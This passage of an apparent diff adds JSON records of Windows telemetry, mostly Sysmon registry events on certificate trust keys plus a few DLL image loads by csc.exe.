"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "csc.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": 